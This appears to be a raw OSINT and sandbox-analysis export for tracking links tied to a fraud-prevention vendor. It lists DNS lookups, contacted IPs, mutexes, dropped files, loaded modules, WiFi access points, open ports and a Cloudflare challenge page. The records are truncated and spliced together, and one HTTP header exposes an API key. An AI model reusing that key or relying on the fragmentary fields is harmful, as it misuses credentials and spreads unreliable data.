u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7ObMdEftDe-2BtwoUusg1QZORJtmp0xEl6S5sap5xWYoybCA-3D-3DWnnK_vzC6nT2XEF-2BapwbNUrNlfA4hPOLn9tQ1TQT9xYQDt2hWsw9zWj-2BctG5FHiTYifrNXSIqHvIfk4wYiqHft11q-2F3j0tSuiHqmWXQoDTBKFQJpab6ijOV39NpKltjL8SW-2FY79myP9CbKTs5hmqq0JQDStM7FnbYGk1fAwShOmUOciXb3CjkLE2ufCgL8PNSCRjhusVMUNQ3u2Gd-2FYsb-2BSrSa55d5mbxLOtrxxGcDDK-2B1f9p3Y6Va3-2BTqJ3IfeSfuFipJb2V-2Bkh9zWo2vQOdY9Ix3pMs8-2FEZOa5i0GMP3G7OwBpTVsKQiZi7QCLGLzLSIGHpuogErAw6isfiwJzMQxJR9n7dHFNLdZv0bBAN0M5a0LmXFTMbEFUYzoSbpIX5hvhwcT6gsAgiTO4cCTgxJwiKf13DMLUbxkfVJW0ygF-2FKlik-3D', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crt.usertrust.com"\n "preventor.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "url1021.joinpreventor.com"\n "vts.zohopublic.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.56:80"\n "34.209.167.56:443"\n "99.84.238.167:443"\n "172.217.12.106:443"\n "142.250.72.200:443"\n "52.202.168.65:443"\n "185.199.111.153:443"\n "143.204.130.223:443"\n "142.250.191.74:443"\n "99.84.238.107:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "13.35.125.32:443"\n "91.199.212.52:80"\n "136.143.191.144:443"\n "204.141.43.48:443"\n "142.250.72.214:443"\n "142.251.214.129:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1B7A.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e44_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e44_ConnHashTable<3652>_HashTable_Mutex"\n "IsoScope_e44_IESQMMUTEX_0_303"\n "IsoScope_e44_IE_EarlyTabStart_0xc44_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_e44_IESQMMUTEX_0_331"\n "IsoScope_e44_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3652"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5fc94f03728d607c48960ad7_nav-educational_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c51ee3b2917a9fc9d3_nav-financial-services_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5c2edba954d452727c1ff_graph_video_biometrics_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d399b50c403dd6ef8a71_icon_solutions_1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fc94f02728d604e2f960ad6_nav-community_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "632a08bb2f3d904070793749_liveness_detection_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6307aad46dbfb3ff5914cc43_arrow_direction_right_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "625514f697cb9539930c08dc_arrow_lists_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "5fc071f4e509f3bc3acd619d_Check%20icon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e34886f01f4ab6763a4_Powerfull-political_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb58c9b980b499eebc9666f_nav-fraud-veritifcation_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fe14b9e5dab5b2dea0a2754_nav-onboarding_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "632a09903b3d143b47a53951_device_authentication_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d096183ee5c61f2081_mob_google%20play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d39997f0b639e8d1db34_icon_solutions_4_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b2bd7876b3f1ab0491_nav-identity-veritifcation_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2ac6d2755267bbee952_nav-anti-money-laundering_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://preventor.com/solutions/authentication\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uploads-ssl.webflow.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "youtube")\n "GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://preventor.com/solutions/authentication\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uploads-ssl.webflow.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "twitter")\n "GET /s/player/7862ca1f/fetch-polyfill.vflset/fetch-polyfill.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.youtube-nocookie.com/embed/7jgxLIApJHI\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: www.youtube-nocookie.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "youtube")\n "OPTIONS /$rpc/google.internal.waa.v1.Waa/Create HTTP/1.1\nAccept: */*\nOrigin: https://www.youtube-nocookie.com\nAccess-Control-Request-Method: POST\nAccess-Control-Request-Headers: x-goog-api-key, content-type, x-user-agent\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: jnn-pa.googleapis.com\nContent-Length: 0\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "youtube")\n "HTTP/1.1 200 OK\nAccess-Control-Allow-Origin: https://www.youtube-nocookie.com\nVary: origin\nVary: referer\nVary: x-origin\nAccess-Control-Allow-Methods: DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT\nAccess-Control-Allow-Headers: x-goog-api-key, content-type, x-user-agent\nAccess-Control-Max-Age: 3600\nDate: Sun, 05 Mar 2023 22:22:28 GMT\nContent-Type: text/html\nServer: ESF\nContent-Length: 0\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nX-Content-Type-Options: nosniff\nAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000" (Indicator: "youtube")\n "POST /$rpc/google.internal.waa.v1.Waa/Create HTTP/1.1\nAccept: */*\nX-Goog-Api-Key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw\nContent-Type: application/json+protobuf\nX-User-Agent: grpc-web-javascript/0.1\nReferer: https://www.youtube-nocookie.com/embed/7jgxLIApJHI\nAccept-Language: en-US\nOrigin: https://www.youtube-nocookie.com\nAccept-Encoding: gzip, defl | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | gamecocks (Net ID: 00:12:17:02:13:1F) | 32.8608, -79.9746 |
| 2023-05-12 03:11:27 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14806242598 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 700 (Net ID: 00:00:85:2B:6E:C9) | 41.8781, -87.6298 |
| 2023-05-12 02:45:06 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'2606:50c0:8003::153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'2606:50c0::/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2606:50c0:8003::153 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 3 | 0 | None | donation.ecash-pay.com | 165.232.113.85 |
| 2023-05-12 02:48:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 28, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://mandrillapp.com/track/click/30195602/equipuid2205673.americommerce.com?p=eyJzIjoiRnplNTFHdEEtWE5XRFUxM0RZanpVSG9EVUFZIiwidiI6MSwicCI6IntcInVcIjozMDE5NTYwMixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2VxdWlwdWlkMjIwNTY3My5hbWVyaWNvbW1lcmNlLmNvbVxcXC9QSElMT1NPUEhZLmh0bWxcIixcImlkXCI6XCI2NjI4ZGRkMzMyZWM0Y2MzYjEzMjRmNzlkNWU0YzAwMlwiLFwidXJsX2lkc1wiOltcIjMyMGQ1YTE1N2Y5MmUyZGU4NzczODI2NzRkNjIwZjI4MThkYTdjZjlcIl19In0', u'signatures': [{u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-11', u'name': u'Loaded modules', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"msedge.exe" loaded module "%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\msedge.exe" at 55350000\n "msedge.exe" loaded module "%WINDIR%\\System32\\ntdll.dll" at 76A30000\n "msedge.exe" loaded module "%WINDIR%\\System32\\kernel32.dll" at 75F80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\KernelBase.dll" at 73A60000\n "msedge.exe" loaded module "\\Program Files (x86)\\Microsoft\\Edge\\Application\\107.0.1418.56\\msedge_elf.dll" at 56890000\n "msedge.exe" loaded module "%WINDIR%\\System32\\advapi32.dll" at 76460000\n "msedge.exe" loaded module "%WINDIR%\\System32\\msvcrt.dll" at 76960000\n "msedge.exe" loaded module "%WINDIR%\\System32\\sechost.dll" at 756B0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\rpcrt4.dll" at 76030000\n "msedge.exe" loaded module "%WINDIR%\\System32\\cryptbase.dll" at 72790000\n "msedge.exe" loaded module "%WINDIR%\\System32\\bcryptprimitives.dll" at 73E80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\version.dll" at 6DE80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\ntmarta.dll" at 71EF0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\ucrtbase.dll" at 72E80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\combase.dll" at 75BA0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\ole32.dll" at 75560000\n "msedge.exe" loaded module "%WINDIR%\\System32\\gdi32.dll" at 75980000\n "msedge.exe" loaded module "%WINDIR%\\System32\\gdi32full.dll" at 72F80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\msvcp_win.dll" at 73D80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\user32.dll" at 75710000\n "msedge.exe" loaded module "%WINDIR%\\System32\\win32u.dll" at 73870000\n "msedge.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 75AC0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\kernel.appcore.dll" at 72DF0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\uxtheme.dll" at 713C0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\clbcatq.dll" at 754C0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\shell32.dll" at 73F00000\n "msedge.exe" loaded module "%WINDIR%\\System32\\cfgmgr32.dll" at 72E30000\n "msedge.exe" loaded module "%WINDIR%\\System32\\SHCore.dll" at 75AF0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\windows.storage.dll" at 73120000\n "msedge.exe" loaded module "%WINDIR%\\System32\\shlwapi.dll" at 758A0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\powrprof.dll" at 72DA0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\profapi.dll" at 72D80000\n "msedge.exe" loaded module "\\Program Files (x86)\\Microsoft\\Edge\\Application\\107.0.1418.56\\msedge.dll" at 3D360000\n "msedge.exe" loaded module "%WINDIR%\\System32\\winmm.dll" at 71280000\n "msedge.exe" loaded module "%WINDIR%\\System32\\oleaut32.dll" at 759F0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\winmmbase.dll" at 71220000\n "msedge.exe" loaded module "%WINDIR%\\System32\\KBDUS.DLL" at 64090000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dwmapi.dll" at 71840000\n "msedge.exe" loaded module "%WINDIR%\\System32\\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll" at 5C760000\n "msedge.exe" loaded module "%WINDIR%\\System32\\twinapi.appcore.dll" at 716C0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\rmclient.dll" at 71630000\n "msedge.exe" loaded module "%WINDIR%\\System32\\bcrypt.dll" at 72880000\n "msedge.exe" loaded module "%WINDIR%\\System32\\userenv.dll" at 72C80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\gpapi.dll" at 71B70000\n "msedge.exe" loaded module "%WINDIR%\\System32\\wkscli.dll" at 6DAA0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\netutils.dll" at 72440000\n "msedge.exe" loaded module "%WINDIR%\\System32\\mdmregistration.dll" at 6A570000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dmcmnutils.dll" at 67280000\n "msedge.exe" loaded module "%WINDIR%\\System32\\crypt32.dll" at 73890000\n "msedge.exe" loaded module "%WINDIR%\\System32\\msasn1.dll" at 72E10000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dbghelp.dll" at 55A10000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc.dll" at 6DF40000\n "msedge.exe" loaded module "%WINDIR%\\System32\\ws2_32.dll" at 75EB0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\nsi.dll" at 759C0000\n "msedge.exe" loaded module "\\Program Files (x86)\\Microsoft\\Edge\\Application\\107.0.1418.56\\ffmpeg.dll" at 555F0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\IPHLPAPI.DLL" at 72340000\n "msedge.exe" loaded module "%WINDIR%\\System32\\ncrypt.dll" at 72850000\n "msedge.exe" loaded module "%WINDIR%\\System32\\ntasn1.dll" at 72810000\n "msedge.exe" loaded module "%WINDIR%\\System32\\secur32.dll" at 6DBD0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\UIAutomationCore.dll" at 657D0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\winhttp.dll" at 6D480000\n "msedge.exe" loaded module "%WINDIR%\\System32\\winspool.drv" at 62DB0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\wintrust.dll" at 73E20000\n "msedge.exe" loaded module "%WINDIR%\\System32\\msctf.dll" at 76150000\n "msedge.exe" loaded module "%WINDIR%\\System32\\DWrite.dll" at 63D80000\n "msedge.exe" loaded module "%WINDIR%\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.248_none_15ced204935f55d7\\comctl32.dll" at 632C0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dpapi.dll" at 72200000\n "msedge.exe" loaded module "%WINDIR%\\System32\\nlaapi.dll" at 6DBE0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc6.dll" at 6DD40000\n "msedge.exe" loaded module "%WINDIR%\\System32\\netprofm.dll" at 6FBF0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\npmproxy.dll" at 6D040000\n "msedge.exe" loaded module "\\Program Files (x86)\\Microsoft\\Edge\\Application\\107.0.1418.56\\microsoft_apis.dll" at 6A0B0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\twinapi.dll" at 5F0E0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\TextInputFramework.dll" at 659E0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\CoreUIComponents.dll" at 6F7D0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\CoreMessaging.dll" at 70500000\n "msedge.exe" loaded module "%WINDIR%\\System32\\WinTypes.dll" at 6F690000\n "msedge.exe" loaded module "%WINDIR%\\System32\\Windows.UI.dll" at 65A80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\setupapi.dll" at 76510000\n "msedge.exe" loaded module "%WINDIR%\\System32\\devobj.dll" at 72B90000\n "msedge.exe" loaded module "%WINDIR%\\System32\\mscms.dll" at 5FFD0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\wtsapi32.dll" at 6DD80000\n "msedge.exe" loaded module "%WINDIR%\\System32\\winsta.dll" at 72B30000\n "msedge.exe" loaded module "%WINDIR%\\System32\\Windows.Security.Authentication.Web.Core.dll" at 5F9F0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\OneCoreCommonProxyStub.dll" at 5FAD0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\iertutil.dll" at 692B0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\wldp.dll" at 71DB0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\netapi32.dll" at 6BEA0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dsreg.dll" at 6AAF0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\msvcp110_win.dll" at 6E190000\n "msedge.exe" loaded module "%WINDIR%\\System32\\cryptsp.dll" at 72770000\n "msedge.exe" loaded module "%WINDIR%\\System32\\propsys.dll" at 6D2C0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\DataExchange.dll" at 5E6E0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\d3d11.dll" at 70210000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dcomp.dll" at 70BA0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\dxgi.dll" at 71BF0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\edputil.dll" at 5D450000\n "msedge.exe" loaded module "%WINDIR%\\System32\\Windows.Media.dll" at 54950000\n "msedge.exe" loaded module "%WINDIR%\\System32\\mfsensorgroup.dll" at 6BEC0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\RTWorkQ.dll" at 620D0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\mfplat.dll" at 61ED0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\atlthunk.dll" at 572F0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\oleacc.dll" at 5E730000\n "msedge.exe" loaded module "%WINDIR%\\System32\\directmanipulation.dll" at 63530000\n "msedge.exe" loaded module "%WINDIR%\\System32\\vaultcli.dll" at 61580000\n "msedge.exe" loaded module "%WINDIR%\\System32\\OneCoreUAPCommonProxyStub.dll" at 6EF90000\n "msedge.exe" loaded module "%WINDIR%\\System32\\Windows.Web.dll" at 5CB10000\n "msedge.exe" loaded module "%WINDIR%\\System32\\actxprxy.dll" at 5C820000\n "msedge.exe" loaded module "%WINDIR%\\System32\\mswsock.dll" at 725B0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\wlanapi.dll" at 6D7B0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\Windows.System.UserProfile.DiagnosticsSettings.dll" at 6A2B0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\sspicli.dll" at 72CB0000\n "msedge.exe" loaded module "%WINDIR%\\System32\\fwpolicyiomgr.dll" at 6A310000\n "msedge.exe" loaded module "%WINDIR%\\System32\\linkinfo.dll" at 5D4A0000\n "msedge.exe" loaded module "%WIND | 185.199.110.153 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:443 | 188.114.97.1 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.90): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2096 | 104.21.6.166 |
| 2023-05-12 02:54:22 | Web Content | No | Web Spider | 3 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="o9rkiN63h_dC1MXH2ewnO9VeNInpcF4XTtlC3.Ope.M-1683860062-0-AdUguWWDLVlZxsWb6e1bnqomUGdvKH9Hr8OR9XhDVbWy_UNZDFZLD8-BRJaoUzBMnZ4MBtuUzqAf-y1NVIXFBZc2zpThNEMVcsemZ6G3H2y2RdwaGI22EiA1S326BJRlVE4Ae2G6hV1-y96EsTpLgRijeuFFSHz05y1jK0LMHQT6Yul8T61BIXmvzdMkcho4NRYjRqIaGwnrNt3GHyXHuLD9Kg0Z1PswrdZsR5u8cj9YNRG5tPHVjIwdXSU_H7FvumTVKSb2DSCVu7zno--l-x_ursgemNqA1Eu9esEfAcEZErO2ynNNPle4iy35Q-002AvCnrTStuzsV9WenG-kzkwfzH4Bgm9BgZjZ2SzceeiUvpx0VbFQ3pFatklpu5sVBuMECIKb-C35grQD9hIe5CnF2tIuq3LpSjTYWdY_G-taMdpge2EijRLIBI6Kfm3KCKgrmIm-M_kaOkhT6zwNZKrbtrmrwvHusBRZM8mDqXK6BGxQEYolgs9YfSL0l717dfEhPntRoL6ZMAEy83CFiWTndZ1SzKSh5MxSqRh8JYSn7-hlp9tzN-SB8T0mkCkP87rm0gHB2Nc1YNmJH6a6djf3APAwio8E6jQftS4RNyx5lSUUZ_BnFys-ZXFUzYbxVs_s5utzzMkEYOyUrEjMwlbzK1bmHQXnmHfBHDfW-9w0KMV_I2KXURlKdWp_aVGaYPgU9RQpOrOu5jXRwZ5WWo3nXJCoJubmH-xr5xweBUbZG-SrvNgarDFttshord388LcpI4vf_DPi5QAhha2ONgO4nEYcsvGjPWmE5gBNnwndanRmSOkYLNoIKdyVDvafFa_9wxBk6pKwvUGADjN1yYITiFNd4Av6OjiMF0eCD0B-rMcf1K_RyJAW0Q63e569MyoALgsa5LuF6A9Fao0NuRtVokTtKXFjE683wyQoxz2rVadCdcz1SAkPujj4gsPBtzmyTzaZ0eAhZEu4ZktRZ3yW_kCzFaoZlWWXPLmMSYOISs0fLmCihg46UN9oyRLijuEDM_jHg4LTV2TnCzG6rH5ukfU2q3hIf7DNVmpydIO4964Rwd7yky69HogBFyvVcLvLJiau__mlfv9Zd8rpuWQeyviCGIKTRzsIwfkMqNPNyw8X9ilDjYLz8Er-YKFTiBYzKowqSDcLfsInmyu-GY3Q4CRe6azk1q2PDI5jsKPqVXZnDO6xM5WOgDfsUs8jCGX-Y7pnubkolyphepCOCRuJYkPER9RlRKn9TP1Iu5pT3zvM--Qn_g2xND5bfgguBbZ7_xzC6vrG4uq7pRN86Jyn1eh0aJoS1o3moXbGaKVZMFxn9St9eHP_LBzqatvidcntyoQnZyEuvoBGzmB7bxsXvanE_k1kK-flL0DxtFCoSL_hYsi2QdekeHyb0moJOnxYk8nOvpGRVJW2aeFOS6zzQYrTf1ZYVM7iyRgHYPN8uylozJaFR27equ7FqddcsitgcuSFaFlYteDEO4eAuImRVXD5QnWHTDDLK-J-a7cd7n5pHrzsbNbpwPeit55PzKCpzI484EAksVFlNAkrwC4SqRB6KhjvHJRu2SsinDAvuebN5jt7N0scno6aUyjSzxwSSpVf6bZrrSm-p-5sQDUjLp64NRXWVN8wvA3_1f2gF_Vosd3y9Sp0fSOsU2F6EIdZdWuHYetxrmSNE6AHJ3RT_C04YBvG6_Q9PkJsb86B49AEElj23DQaHfl1GA9qGlbppJY5scudrsxneqxrD58hLbvdzxrWwdzLczRciePhFl8OKW5eaSkWmK-s65YIEnBLOSnaXmYwPzvjg8f67iFNC-e3l5m0MDQVx52PRj2vf8DWG_AfPmw2afbxcw9ppplZ9oiixK20YnEv54WswcS_oGpXEwjRNaflmeY-Y06FMexN5UEccQFy7OcRAYdF-UVs7RwoJUdks1JoRoK9OtuC